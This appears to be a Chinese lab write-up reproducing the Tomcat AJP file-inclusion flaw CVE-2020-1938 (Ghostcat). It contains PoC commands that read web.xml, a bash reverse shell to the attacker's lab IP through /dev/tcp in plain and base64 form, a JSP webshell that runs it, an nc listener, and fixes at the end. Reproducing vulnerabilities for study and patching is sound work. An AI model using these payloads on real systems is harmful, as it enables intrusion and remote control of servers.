Tomcat 文件读取/文件包含漏洞复现（CVE-2020-1938）

0x01 漏洞概述漏洞简介:

        2020年2月20日，国家信息安全漏洞共享平台（CNVD）发布了关于Apache Tomcat存在文件包含漏洞的安全公告（CNVD-2020-10487，对应CVE-2020-1938）

        CVE-2020-1938是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞，由于 Tomcat AJP 协议设计上存在缺陷，攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件，例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下，配合文件包含的利用还可以达到远程代码执行的危害。

0x02 影响版本:

• Apache Tomcat 6
• Apache Tomcat 7 < 7.0.100
• Apache Tomcat 8 < 8.5.51
• Apache Tomcat 9 < 9.0.31

0x03 环境准备：

服务器：Centos （IP:192.168.217.142）

Tomcat 版本：Apache Tomcat 8.5.47

攻击机：Kali （IP：192.168.217.141）

POC ：CNVD-2020-10487-Tomcat-Ajp-lfi

（ https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi ）

• 这里直接使用docker还原之前的 Tomcat 8.5 的镜像，也可以自己使用docker直接拉取对应版本的镜像，在影响版本之间就行

•  部署好相关的镜像后，直接访问看看是否部署成功

• 然后就是下载POC,部署在攻击主机上，自此环境准备完成

0x04 漏洞复现：

任意文件读取

• kali上运行POC读取tomcat的配置文件信息web.xml，成功读到配置信息

python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.217.140 -p 8009 -f WEB-INF/web.xml

 利用该漏洞实现RCE(反弹shell)

• 使用bash反弹shell，端口为攻击机的520

bash -i >& /dev/tcp/192.168.217.141/520 0>&1

• 因为要在java程序中进行文件包含，还要再使用base64编码上述命令，可能会报错

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xNDEvNTIwIDA+JjE=

• 最后java执行的反弹shell如下：

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xNDEvNTIwIDA+JjE=}|{base64,-d}|{bash,-i}

模拟上传木马

• 在 linux 服务器中创建一个 shell.txt 文件，模拟上传木马内容如下：

<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xNDEvNTIwIDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>

• 将shell.txt文件拷贝至docker容器的webapps下的ROOT目录下

docker cp shell.txt ghostcat:/usr/local/tomcat/webapps/ROOT/

• kali使用 nc 监听端口520

nc -lvp 520

• 更改POC，在脚本最后处将asdf加上.jsp，如下：

• 直接运行POC，成功反弹shell

python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.217.140 -p 8009 -f shell.txt

0x05 修复方法：

• 官方网站下载新版本进行升级。

• 直接关闭 AJP Connector，或将其监听地址改为仅监听本机 localhost。

• 若需使用 Tomcat AJP 协议，可根据使用版本配置协议属性设置认证凭证。